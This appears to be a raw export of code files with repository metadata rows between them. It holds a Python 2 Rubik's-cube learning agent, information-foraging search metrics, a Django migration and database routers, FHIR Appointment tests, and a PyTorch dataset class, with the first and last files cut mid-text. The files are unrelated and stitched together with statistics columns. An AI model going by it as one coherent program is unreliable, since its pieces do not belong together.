                # It's a good state to exploit
                return actions[np.argmax(G)]
            # It's not important, so we can explore
            return self.env.sample_action()
        else:
            # It's not a seen state, so we can explore
            self.nonseen_states += 1
            self.bloom_states.add(x)
            return self.env.sample_action()
class QubeBloomDualPARAgent(object):
    """Agent with two PassiveAggressive regressor banks: regular models
    updated on every experience and 'elite' models updated only on
    high-return (G > 1.0) experiences. A Bloom filter approximately
    tracks visited states.

    Parameters:
    env: Environment exposing actions_available and sample_action().
    feature_transformer: Object with a transform(state, normalize) method.
    """

    def __init__(self, env, feature_transformer):
        self.env = env
        self.models = {}
        self.models_elite = {}
        self.feature_transformer = feature_transformer
        for a in env.actions_available:
            self.models[a] = PassiveAggressiveRegressor(C=1.0, fit_intercept=True, shuffle=False,
                                                        loss='epsilon_insensitive', epsilon=0.1)
            self.models_elite[a] = PassiveAggressiveRegressor(C=1.0, fit_intercept=True, shuffle=False,
                                                              loss='epsilon_insensitive', epsilon=0.1)
        self.bloom_states = BloomFilter(max_elements=256**2)

    def predict(self, s):
        """Return the predicted values of all actions for state s."""
        return np.array([self.predict_from_action(s, a) for a in self.models.keys()])

    def predict_from_action(self, s, a):
        """Predicted value of action a in state s; 0.0 if the model is unfitted."""
        X = self.feature_transformer.transform(s, normalize=True)
        try:
            y = self.models[a].predict(X)[0]
        except Exception:
            # BUG FIX: narrowed from a bare `except:`; predict() raises
            # until the model has seen its first partial_fit.
            y = 0.0
        return y

    def predict_from_action_elite(self, s, a):
        """Elite-model prediction for action a in state s; 0.0 if unfitted."""
        X = self.feature_transformer.transform(s, normalize=True)
        try:
            y = self.models_elite[a].predict(X)[0]
        except Exception:
            y = 0.0
        return y

    def update(self, s, a, G, gamma=0.99, lambda_=0.7):
        """Fit the regular model towards G; fit the elite model too when G > 1.0.

        gamma and lambda_ are accepted for interface compatibility only.
        """
        X = self.feature_transformer.transform(s, normalize=True)
        self.models[a].partial_fit(np.array([X]), np.array([G]))
        if G > 1.0:
            self.models_elite[a].partial_fit(np.array([X]), np.array([G]))

    def sample_action(self, s, eps):
        """Choose an action, preferring confident elite predictions.

        eps is accepted for interface compatibility but not used.
        Unlike the SGD variant, exploitation needs only max_G > 0.0 here.
        """
        x = tuple(self.feature_transformer.transform(s, normalize=False))
        if x in self.bloom_states:
            # Maybe it's a seen state (Bloom filters can give false positives).
            # Evaluate both model banks in the same `actions` order so that
            # np.argmax indexes the correct action.
            actions = list(self.models.keys())
            G = [self.predict_from_action(s, a) for a in actions]
            max_G = np.max(G)
            G_elite = [self.predict_from_action_elite(s, a) for a in actions]
            max_G_elite = np.max(G_elite)
            if (max_G_elite - max(0.0, max_G)) > 0.5 and max_G_elite >= 1.0:
                #print "Taking an elitist action!"
                return actions[np.argmax(G_elite)]
            else:
                a = actions[np.argmax(G)]
                # NOTE(review): an on-policy elite-model update was sketched
                # here previously but is disabled.
                if max_G > 0.0:
                    # It's a good state to exploit
                    return a
                else:
                    # It's not important, so we can explore
                    return self.env.sample_action()
        else:
            # It's not a seen state, so we can explore
            self.bloom_states.add(x)
            return self.env.sample_action()
def play_one(model, env, eps, gamma=0.99, lambda_=0.7, max_iters=1000):
    """Run one episode: act until the cube is solved or max_iters is hit.

    Parameters:
    model: Agent exposing sample_action, predict and update methods.
    env: Environment exposing get_state, take_action and is_solved.
    eps: Exploration parameter forwarded to model.sample_action.
    gamma: Discount factor used in the one-step TD target.
    lambda_: Trace-decay parameter forwarded to model.update.
    max_iters: Hard cap on the number of steps in the episode.

    Returns:
    total_reward: Sum of rewards collected during the episode.
    """
    env.actions_taken = []  # Reset actions taken on the scramble stage
    observation = env.get_state()
    total_reward = 0
    iters = 0
    while not env.is_solved() and iters < max_iters:
        # Make a movement
        action = model.sample_action(observation, eps)
        prev_observation = observation
        # NOTE(review): the `solved` flag returned here is unused;
        # env.is_solved() is queried again below instead.
        observation, reward, solved = env.take_action(action)
        total_reward += reward
        if env.is_solved():
            print "WOW! The cube is solved! Algorithm followed: %s" % str(env.actions_taken)
        # Update the model
        next_state = model.predict(observation)
        # assert(len(next_state.shape) == 1)
        # One-step TD target: reward plus discounted best next-state value.
        G = reward + gamma*np.max(next_state)
        model.update(prev_observation, action, G, gamma, lambda_)
        iters += 1
    return total_reward
| 38.05298
| 103
| 0.557779
| 1,513
| 11,492
| 4.09121
| 0.107072
| 0.06462
| 0.071082
| 0.080129
| 0.826979
| 0.826979
| 0.819063
| 0.813247
| 0.801939
| 0.801939
| 0
| 0.019111
| 0.330665
| 11,492
| 302
| 104
| 38.05298
| 0.785621
| 0.098938
| 0
| 0.770642
| 0
| 0
| 0.020549
| 0.002617
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.018349
| 0.013761
| null | null | 0.009174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b46a54ae29aaa759c6eb033495b9e8a3e7aba747
| 141
|
py
|
Python
|
environment/gym-Continuous/gym_Continuous/envs/__init__.py
|
nickplas/Internship_ESTECO
|
576039255a7f087585e19f323873f8e5dc2af39b
|
[
"Apache-2.0"
] | 2
|
2021-03-05T02:11:43.000Z
|
2021-04-23T13:18:16.000Z
|
environment/gym-Continuous/gym_Continuous/envs/__init__.py
|
nickplas/Internship_ESTECO
|
576039255a7f087585e19f323873f8e5dc2af39b
|
[
"Apache-2.0"
] | null | null | null |
environment/gym-Continuous/gym_Continuous/envs/__init__.py
|
nickplas/Internship_ESTECO
|
576039255a7f087585e19f323873f8e5dc2af39b
|
[
"Apache-2.0"
] | null | null | null |
from gym_Continuous.envs.Continuous_env import ContinuousEnv
#from gym_Continuous.envs.Continuous_extrahard_env import ContinuousExtraHardEnv
| 70.5
| 80
| 0.914894
| 17
| 141
| 7.294118
| 0.529412
| 0.112903
| 0.274194
| 0.33871
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.049645
| 141
| 2
| 80
| 70.5
| 0.925373
| 0.560284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b46e977eac20ec33987eb97a90fef9a998a606d1
| 29
|
py
|
Python
|
VisualCompass/__init__.py
|
tioguerra/VisualCompass
|
e81585194c88ae430fc0b83b0a51596c52ec9aef
|
[
"MIT"
] | 1
|
2019-04-23T12:17:03.000Z
|
2019-04-23T12:17:03.000Z
|
VisualCompass/__init__.py
|
tioguerra/VisualCompass
|
e81585194c88ae430fc0b83b0a51596c52ec9aef
|
[
"MIT"
] | null | null | null |
VisualCompass/__init__.py
|
tioguerra/VisualCompass
|
e81585194c88ae430fc0b83b0a51596c52ec9aef
|
[
"MIT"
] | null | null | null |
from VisualCompass import *
| 9.666667
| 27
| 0.793103
| 3
| 29
| 7.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 29
| 2
| 28
| 14.5
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
81f64d18cae955594fcdfbb7ed0515e19665a345
| 5,238
|
py
|
Python
|
scripts/ruler/measures/cwl_ift.py
|
leifos/cwl
|
7f9f3133373079cf1f65b5e370da4accef59380f
|
[
"MIT"
] | 6
|
2018-07-31T11:00:59.000Z
|
2021-06-18T06:29:31.000Z
|
scripts/ruler/measures/cwl_ift.py
|
leifos/cwl
|
7f9f3133373079cf1f65b5e370da4accef59380f
|
[
"MIT"
] | null | null | null |
scripts/ruler/measures/cwl_ift.py
|
leifos/cwl
|
7f9f3133373079cf1f65b5e370da4accef59380f
|
[
"MIT"
] | 1
|
2020-10-15T03:23:29.000Z
|
2020-10-15T03:23:29.000Z
|
import numpy as np
import math
from ruler.measures.cwl_metrics import CWLMetric
'''
Information Foraging Based Measure
@inproceedings{Azzopardi:2018:MUS:3209978.3210027,
author = {Azzopardi, Leif and Thomas, Paul and Craswell, Nick},
title = {Measuring the Utility of Search Engine Result Pages: An Information Foraging Based Measure},
booktitle = {The 41st International ACM SIGIR Conference on Research \&\#38; Development in Information Retrieval},
series = {SIGIR '18},
year = {2018},
location = {Ann Arbor, MI, USA},
pages = {605--614},
numpages = {10},
}
'''
class IFTGoalCWLMetric(CWLMetric):
    """Information Foraging Theory metric, goal component (C1).

    The continuation probability C1 falls as the cumulative gain approaches
    the user's goal T (Azzopardi, Thomas & Craswell, SIGIR 2018).

    Parameters:
    T: gain goal of the user.
    b1: scale parameter of the goal sigmoid.
    R1: rate parameter of the goal sigmoid.
    """

    def __init__(self, T, b1, R1):
        # BUG FIX: the original called super(CWLMetric, self).__init__(),
        # which starts the MRO lookup *after* CWLMetric and therefore
        # skipped CWLMetric's own initialisation entirely.
        super(IFTGoalCWLMetric, self).__init__()
        self.metric_name = "IFT-C1-T={0}-b1={1}-R1={2}".format(T,b1,R1)
        self.b1 = b1
        self.T = T
        self.R1 = R1
        self.bibtex = "@inproceedings{Azzopardi:2018:MUS:3209978.3210027," \
                      "author = {Azzopardi, Leif and Thomas, Paul and Craswell, Nick}," \
                      "title = {Measuring the Utility of Search Engine Result Pages: An Information Foraging Based Measure}," \
                      "booktitle = {The 41st International ACM SIGIR Conference on Research \&\#38; Development in Information Retrieval}," \
                      "series = {SIGIR '18}," \
                      "year = {2018}," \
                      "location = {Ann Arbor, MI, USA}," \
                      "pages = {605--614}," \
                      "numpages = {10}," \
                      "} "

    def name(self):
        """Return the parameterised metric name."""
        return "IFT-C1-T={0}-b1={1}-R1={2}".format(self.T, self.b1, self.R1)

    def c_vector(self, ranking):
        """Return the continuation probability C1 at each rank of the ranking."""
        cgains = np.cumsum(ranking.gains)
        return np.array([self.c1_func(cg) for cg in cgains])

    def c1_func(self, yi):
        """Goal sigmoid: probability of continuing given cumulative gain yi."""
        ex = (1.0 + self.b1 * math.pow(math.e, ((self.T-yi)* self.R1)))
        return 1.0 - math.pow(ex,-1.0)
class IFTRateCWLMetric(CWLMetric):
    """Information Foraging Theory metric, rate component (C2).

    The continuation probability C2 depends on the rate of gain
    (cumulative gain over cumulative cost) relative to the desired rate A
    (Azzopardi, Thomas & Craswell, SIGIR 2018).

    Parameters:
    A: desired rate of gain.
    b2: scale parameter of the rate sigmoid.
    R2: rate parameter of the rate sigmoid.
    """

    def __init__(self, A, b2, R2):
        # BUG FIX: the original called super(CWLMetric, self).__init__(),
        # which starts the MRO lookup *after* CWLMetric and therefore
        # skipped CWLMetric's own initialisation entirely.
        super(IFTRateCWLMetric, self).__init__()
        self.metric_name = "IFT-C2-A={0}-b2={1}-R2={2}".format(A, b2, R2)
        self.b2 = b2
        self.A = A
        self.R2 = R2
        self.bibtex = "@inproceedings{Azzopardi:2018:MUS:3209978.3210027," \
                      "author = {Azzopardi, Leif and Thomas, Paul and Craswell, Nick}," \
                      "title = {Measuring the Utility of Search Engine Result Pages: An Information Foraging Based Measure}," \
                      "booktitle = {The 41st International ACM SIGIR Conference on Research \&\#38; Development in Information Retrieval}," \
                      "series = {SIGIR '18}," \
                      "year = {2018}," \
                      "location = {Ann Arbor, MI, USA}," \
                      "pages = {605--614}," \
                      "numpages = {10}," \
                      "} "

    def name(self):
        """Return the parameterised metric name."""
        return "IFT-C2-A={0}-b2={1}-R2={2}".format(self.A, self.b2, self.R2)

    def c_vector(self, ranking):
        """Return the continuation probability C2 at each rank of the ranking."""
        cgains = np.cumsum(ranking.gains)
        ccosts = np.cumsum(ranking.costs)
        cvec = [self.c2_func(cgains[i], ccosts[i])
                for i in range(len(ranking.gains))]
        return np.array(cvec)

    def c2_func(self, yi, ki):
        """Rate sigmoid: probability of continuing at gain yi and cost ki."""
        ex = (1.0 + self.b2 * math.pow(math.e, ((self.A - (yi/ki))* self.R2)))
        return math.pow(ex,-1.0)
class IFTGoalRateCWLMetric(CWLMetric):
    """Information Foraging Theory metric combining goal (C1) and rate (C2).

    The per-rank continuation probability is the product C1 * C2
    (Azzopardi, Thomas & Craswell, SIGIR 2018).

    Parameters:
    T, b1, R1: goal sigmoid parameters (see IFTGoalCWLMetric).
    A, b2, R2: rate sigmoid parameters (see IFTRateCWLMetric).
    """

    def __init__(self, T, b1, R1, A, b2, R2):
        # BUG FIX: the original called super(CWLMetric, self).__init__(),
        # which starts the MRO lookup *after* CWLMetric and therefore
        # skipped CWLMetric's own initialisation entirely.
        super(IFTGoalRateCWLMetric, self).__init__()
        self.metric_name = "IFT-C1-C2-T={0}-b1={1}-R1={2}-A={3}-b2={4}-R2={5}".format(T, b1, R1, A, b2, R2)
        self.b1 = b1
        self.T = T
        self.R1 = R1
        self.b2 = b2
        self.A = A
        self.R2 = R2
        self.bibtex = """
        @inproceedings{Azzopardi:2018:MUS:3209978.3210027,
        author = {Azzopardi, Leif and Thomas, Paul and Craswell, Nick},
        title = {Measuring the Utility of Search Engine Result Pages: An Information Foraging Based Measure},
        booktitle = {The 41st International ACM SIGIR Conference on Research \&\#38; Development in Information Retrieval},
        series = {SIGIR '18},
        year = {2018},
        location = {Ann Arbor, MI, USA},
        pages = {605--614},
        numpages = {10},
        }
        """

    def name(self):
        """Return the parameterised metric name."""
        return "IFT-C1-C2-T={0}-b1={1}-R1={2}-A={3}-b2={4}-R2={5}".format(self.T, self.b1, self.R1, self.A, self.b2, self.R2)

    def c_vector(self, ranking):
        """Return the combined continuation probability C1*C2 at each rank."""
        cgains = np.cumsum(ranking.gains)
        ccosts = np.cumsum(ranking.costs)
        cvec = [self.c1_func(cgains[i]) * self.c2_func(cgains[i], ccosts[i])
                for i in range(len(ranking.gains))]
        return np.array(cvec)

    def c2_func(self, yi, ki):
        """Rate sigmoid: probability of continuing at gain yi and cost ki."""
        ex = (1.0 + self.b2 * math.pow(math.e, ((self.A - (yi/ki))* self.R2)))
        return math.pow(ex,-1.0)

    def c1_func(self, yi):
        """Goal sigmoid: probability of continuing given cumulative gain yi."""
        ex = (1.0 + self.b1 * math.pow(math.e, ((self.T-yi)* self.R1)))
        return 1.0 - math.pow(ex,-1.0)
| 36.124138
| 141
| 0.54601
| 689
| 5,238
| 4.09434
| 0.161103
| 0.00709
| 0.011344
| 0.054945
| 0.929458
| 0.929458
| 0.922368
| 0.883729
| 0.883729
| 0.847926
| 0
| 0.076313
| 0.302024
| 5,238
| 144
| 142
| 36.375
| 0.695295
| 0
| 0
| 0.711538
| 0
| 0.019231
| 0.337482
| 0.074246
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.028846
| 0.028846
| 0.278846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81fe668029e4ddd8e1022f5573c44375b71e1557
| 2,915
|
py
|
Python
|
src/projects/migrations/0002_auto_20170112_1016.py
|
MEEM-MLHD/territoire_conseil
|
a1213575bc4fa12574859aab0dfa90f4eff7c6eb
|
[
"BSD-3-Clause"
] | null | null | null |
src/projects/migrations/0002_auto_20170112_1016.py
|
MEEM-MLHD/territoire_conseil
|
a1213575bc4fa12574859aab0dfa90f4eff7c6eb
|
[
"BSD-3-Clause"
] | null | null | null |
src/projects/migrations/0002_auto_20170112_1016.py
|
MEEM-MLHD/territoire_conseil
|
a1213575bc4fa12574859aab0dfa90f4eff7c6eb
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-01-12 10:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax a batch of Project fields to blank-able CharField(max_length=255)."""

    dependencies = [
        ('projects', '0001_initial'),
    ]

    # Every altered field receives the identical definition, so the
    # operations are generated from the list of field names.
    operations = [
        migrations.AlterField(
            model_name='project',
            name=field_name,
            field=models.CharField(blank=True, max_length=255),
        )
        for field_name in (
            'contact_firstname',
            'contact_function',
            'contact_lastname',
            'contact_mail',
            'contact_phone',
            'contact_service',
            'ddt_reference_name',
            'ddt_reference_service',
            'epci_name',
            'epci_siren',
            'interventions_others',
            'manager_other',
            'other_perimeter',
            'town_insee',
            'town_name',
        )
    ]
| 32.032967
| 63
| 0.565352
| 276
| 2,915
| 5.778986
| 0.206522
| 0.188088
| 0.23511
| 0.272727
| 0.829467
| 0.829467
| 0.829467
| 0.8
| 0.8
| 0.771787
| 0
| 0.032795
| 0.320069
| 2,915
| 90
| 64
| 32.388889
| 0.771948
| 0.022642
| 0
| 0.722892
| 1
| 0
| 0.119115
| 0.007379
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.024096
| 0
| 0.060241
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c30045c1b50153174559d358cf1d70068ac4cbf5
| 6,529
|
py
|
Python
|
fhir/resources/DSTU2/tests/test_appointment.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 144
|
2019-05-08T14:24:43.000Z
|
2022-03-30T02:37:11.000Z
|
fhir/resources/DSTU2/tests/test_appointment.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 82
|
2019-05-13T17:43:13.000Z
|
2022-03-30T16:45:17.000Z
|
fhir/resources/DSTU2/tests/test_appointment.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 48
|
2019-04-04T14:14:53.000Z
|
2022-03-30T06:07:31.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timezone
from .. import fhirtypes # noqa: F401
from .. import appointment
def test_Appointment_1(base_settings):
    """Parse the request example fixture and round-trip it through dict()."""
    fixture = (
        base_settings["unittest_data_dir"]
        / "appointment-example-request.canonical.json"
    )
    parsed = appointment.Appointment.parse_file(
        fixture, content_type="application/json", encoding="utf-8"
    )
    assert parsed.resource_type == "Appointment"
    impl_Appointment_1(parsed)

    # Round-trip: serialise to a dict and rebuild the resource from it.
    as_dict = parsed.dict()
    assert as_dict["resourceType"] == "Appointment"
    rebuilt = appointment.Appointment(**as_dict)
    impl_Appointment_1(rebuilt)
def impl_Appointment_1(inst):
    """Assert the expected field values of the request-example fixture.

    Called twice per test (on the parsed fixture and on its round-tripped
    copy), so it must not mutate `inst`.
    """
    assert (
        inst.comment
        == "Further expand on the results of the MRI and determine the next actions that may be appropriate."
    )
    assert inst.description == "Discussion on the results of your recent MRI"
    assert inst.id == "examplereq"
    assert (
        inst.identifier[0].system == "http://example.org/sampleappointment-identifier"
    )
    assert inst.identifier[0].value == "123"
    assert inst.minutesDuration == 15
    # Participant 0: the patient.
    assert inst.participant[0].actor.display == "Peter James Chalmers"
    assert inst.participant[0].actor.reference == "Patient/example"
    assert inst.participant[0].required == "required"
    assert inst.participant[0].status == "needs-action"
    # Participant 1: the attending practitioner (no actor in this fixture).
    assert inst.participant[1].required == "required"
    assert inst.participant[1].status == "needs-action"
    assert inst.participant[1].type[0].coding[0].code == "attending"
    # Participant 2: the location.
    assert inst.participant[2].actor.display == "South Wing, second floor"
    assert inst.participant[2].actor.reference == "Location/1"
    assert inst.participant[2].required == "required"
    assert inst.participant[2].status == "accepted"
    assert inst.priority == 5
    assert inst.reason.text == "Clinical Review"
    assert inst.slot[0].reference == "Slot/example"
    assert inst.status == "proposed"
    assert inst.text.div == "<div>Brian MRI results discussion</div>"
    assert inst.text.status == "generated"
    assert inst.type.coding[0].code == "52"
    assert inst.type.coding[0].display == "General Discussion"
def test_Appointment_2(base_settings):
    """Parse the appointment-example fixture and round-trip it through dict()."""
    json_path = base_settings["unittest_data_dir"] / "appointment-example.canonical.json"
    parsed = appointment.Appointment.parse_file(
        json_path, content_type="application/json", encoding="utf-8"
    )
    assert parsed.resource_type == "Appointment"
    impl_Appointment_2(parsed)
    # Rebuild the resource from its own serialized form to prove a lossless round trip.
    payload = parsed.dict()
    assert payload["resourceType"] == "Appointment"
    rebuilt = appointment.Appointment(**payload)
    impl_Appointment_2(rebuilt)
def impl_Appointment_2(inst):
    """Check every asserted field of the 'example' Appointment fixture."""
    checks = [
        (inst.comment,
         "Further expand on the results of the MRI and determine the next "
         "actions that may be appropriate."),
        (inst.description, "Discussion on the results of your recent MRI"),
        (inst.end, datetime(2013, 12, 10, 11, 0, 0, tzinfo=timezone.utc)),
        (inst.id, "example"),
        (inst.participant[0].actor.display, "Peter James Chalmers"),
        (inst.participant[0].actor.reference, "Patient/example"),
        (inst.participant[0].required, "required"),
        (inst.participant[0].status, "accepted"),
        (inst.participant[1].actor.display, "Dr Adam Careful"),
        (inst.participant[1].actor.reference, "Practitioner/example"),
        (inst.participant[1].required, "required"),
        (inst.participant[1].status, "accepted"),
        (inst.participant[1].type[0].coding[0].code, "attending"),
        (inst.participant[2].actor.display, "South Wing, second floor"),
        (inst.participant[2].actor.reference, "Location/1"),
        (inst.participant[2].required, "required"),
        (inst.participant[2].status, "accepted"),
        (inst.priority, 5),
        (inst.start, datetime(2013, 12, 10, 9, 0, 0, tzinfo=timezone.utc)),
        (inst.status, "booked"),
        (inst.text.div, "<div>Brian MRI results discussion</div>"),
        (inst.text.status, "generated"),
        (inst.type.coding[0].code, "52"),
        (inst.type.coding[0].display, "General Discussion"),
    ]
    for actual, wanted in checks:
        assert actual == wanted
def test_Appointment_3(base_settings):
    """Parse the appointment-example2doctors fixture and round-trip it through dict()."""
    json_path = (
        base_settings["unittest_data_dir"]
        / "appointment-example2doctors.canonical.json"
    )
    parsed = appointment.Appointment.parse_file(
        json_path, content_type="application/json", encoding="utf-8"
    )
    assert parsed.resource_type == "Appointment"
    impl_Appointment_3(parsed)
    # Rebuild the resource from its own serialized form to prove a lossless round trip.
    payload = parsed.dict()
    assert payload["resourceType"] == "Appointment"
    rebuilt = appointment.Appointment(**payload)
    impl_Appointment_3(rebuilt)
def impl_Appointment_3(inst):
    """Check every asserted field of the '2docs' Appointment fixture."""
    checks = [
        (inst.comment,
         "Clarify the results of the MRI to ensure context of test was correct"),
        (inst.description, "Discussion about Peter Chalmers MRI results"),
        (inst.end, datetime(2013, 12, 9, 11, 0, 0, tzinfo=timezone.utc)),
        (inst.id, "2docs"),
        (inst.participant[0].actor.display, "Peter James Chalmers"),
        (inst.participant[0].actor.reference, "Patient/example"),
        (inst.participant[0].required, "information-only"),
        (inst.participant[0].status, "accepted"),
        (inst.participant[1].actor.display, "Dr Adam Careful"),
        (inst.participant[1].actor.reference, "Practitioner/example"),
        (inst.participant[1].required, "required"),
        (inst.participant[1].status, "accepted"),
        (inst.participant[2].actor.display, "Luigi Maas"),
        (inst.participant[2].actor.reference, "Practitioner/f202"),
        (inst.participant[2].required, "required"),
        (inst.participant[2].status, "accepted"),
        (inst.participant[3].actor.display, "Phone Call"),
        (inst.participant[3].required, "information-only"),
        (inst.participant[3].status, "accepted"),
        (inst.priority, 5),
        (inst.start, datetime(2013, 12, 9, 9, 0, 0, tzinfo=timezone.utc)),
        (inst.status, "booked"),
        (inst.text.div, "<div>Brian MRI results discussion</div>"),
        (inst.text.status, "generated"),
        (inst.type.coding[0].code, "52"),
        (inst.type.coding[0].display, "General Discussion"),
    ]
    for actual, wanted in checks:
        assert actual == wanted
| 42.122581
| 109
| 0.695053
| 808
| 6,529
| 5.560644
| 0.175743
| 0.166926
| 0.182284
| 0.058758
| 0.859559
| 0.851547
| 0.817716
| 0.81282
| 0.81282
| 0.784331
| 0
| 0.027917
| 0.177056
| 6,529
| 154
| 110
| 42.396104
| 0.808301
| 0.034768
| 0
| 0.618321
| 0
| 0
| 0.243011
| 0.018742
| 0
| 0
| 0
| 0
| 0.618321
| 1
| 0.045802
| false
| 0
| 0.022901
| 0
| 0.068702
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c37adcad4f542d27da443998e4457b5b0198e4de
| 2,603
|
py
|
Python
|
codeArena/routers/db_routers.py
|
IT-Academy-Social-Projects-KRV/CodeArena
|
c0a5170ed46bcd7808b2cbe4f3a7aaeb4ff49384
|
[
"MIT"
] | null | null | null |
codeArena/routers/db_routers.py
|
IT-Academy-Social-Projects-KRV/CodeArena
|
c0a5170ed46bcd7808b2cbe4f3a7aaeb4ff49384
|
[
"MIT"
] | 10
|
2021-08-15T08:48:26.000Z
|
2021-11-25T15:09:27.000Z
|
codeArena/routers/db_routers.py
|
IT-Academy-Social-Projects-KRV/CodeArena
|
c0a5170ed46bcd7808b2cbe4f3a7aaeb4ff49384
|
[
"MIT"
] | 1
|
2022-01-05T09:16:28.000Z
|
2022-01-05T09:16:28.000Z
|
class PostgresRouter:
    """Route ORM traffic for the relational apps to the 'default' database."""

    # Apps whose models live in the default (Postgres) database.
    route_app_labels = {'auth', 'contenttypes', 'sessions', 'admin', 'user', 'vacancies', 'social_django'}

    def db_for_read(self, model, **hints):
        """Send reads for routed apps to the default database; defer otherwise."""
        return 'default' if model._meta.app_label in self.route_app_labels else None

    def db_for_write(self, model, **hints):
        """Send writes for routed apps to the default database; defer otherwise."""
        return 'default' if model._meta.app_label in self.route_app_labels else None

    def allow_relation(self, obj1, obj2, **hints):
        """Permit a relation when either side belongs to a routed app."""
        labels = {obj1._meta.app_label, obj2._meta.app_label}
        return True if labels & self.route_app_labels else None

    def allow_migrate(self, db, app_label, model_name=None, **hints):
        """Keep migrations for routed apps on the default database only."""
        if app_label not in self.route_app_labels:
            # Not our app: let another router (or the default policy) decide.
            return None
        return db == 'default'
class MongoRouter:
    """Route ORM traffic for the document-store apps to the 'mongo' database."""

    # Apps whose models live in the mongo database.
    route_app_labels = {
        'task',
        'competition',
        'news'
    }

    def db_for_read(self, model, **hints):
        """Send reads for routed apps to the mongo database; defer otherwise."""
        return 'mongo' if model._meta.app_label in self.route_app_labels else None

    def db_for_write(self, model, **hints):
        """Send writes for routed apps to the mongo database; defer otherwise."""
        return 'mongo' if model._meta.app_label in self.route_app_labels else None

    def allow_relation(self, obj1, obj2, **hints):
        """Permit a relation when either side belongs to a routed app."""
        labels = {obj1._meta.app_label, obj2._meta.app_label}
        return True if labels & self.route_app_labels else None

    def allow_migrate(self, db, app_label, model_name=None, **hints):
        """Keep migrations for routed apps on the mongo database only."""
        if app_label not in self.route_app_labels:
            # Not our app: let another router (or the default policy) decide.
            return None
        return db == 'mongo'
| 29.91954
| 106
| 0.587399
| 337
| 2,603
| 4.31454
| 0.181009
| 0.110041
| 0.192572
| 0.096286
| 0.856946
| 0.856946
| 0.856946
| 0.817056
| 0.817056
| 0.817056
| 0
| 0.00459
| 0.330388
| 2,603
| 86
| 107
| 30.267442
| 0.829604
| 0.24587
| 0
| 0.782609
| 0
| 0
| 0.063037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173913
| false
| 0
| 0
| 0
| 0.608696
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
5eecfb09957f1ee02192df44f2832ee6d2bc682e
| 4,979
|
py
|
Python
|
utils/Datasets.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
utils/Datasets.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
utils/Datasets.py
|
meliao/fourier_neural_operator
|
216915c6f1acd0651c7203bc8f16824efc495c5f
|
[
"MIT"
] | null | null | null |
import torch
class OneStepDataSetComplex(torch.utils.data.Dataset):
    """One-step pairs (u(t-1), u(t)) drawn from complex-valued trajectories.

    Fixes over the original: the unused ``idx_original`` locals are removed,
    the dead commented-out ``self.__getitem__`` rebinding is deleted (instance
    attributes never participate in the ``[]`` protocol, which is why that
    approach was abandoned), and the duplicated flat-index arithmetic is
    factored into one helper.

    Args:
        X: array-like of shape (n_trajectories, n_times, n_grid); stored as
            a ``torch.cfloat`` tensor.
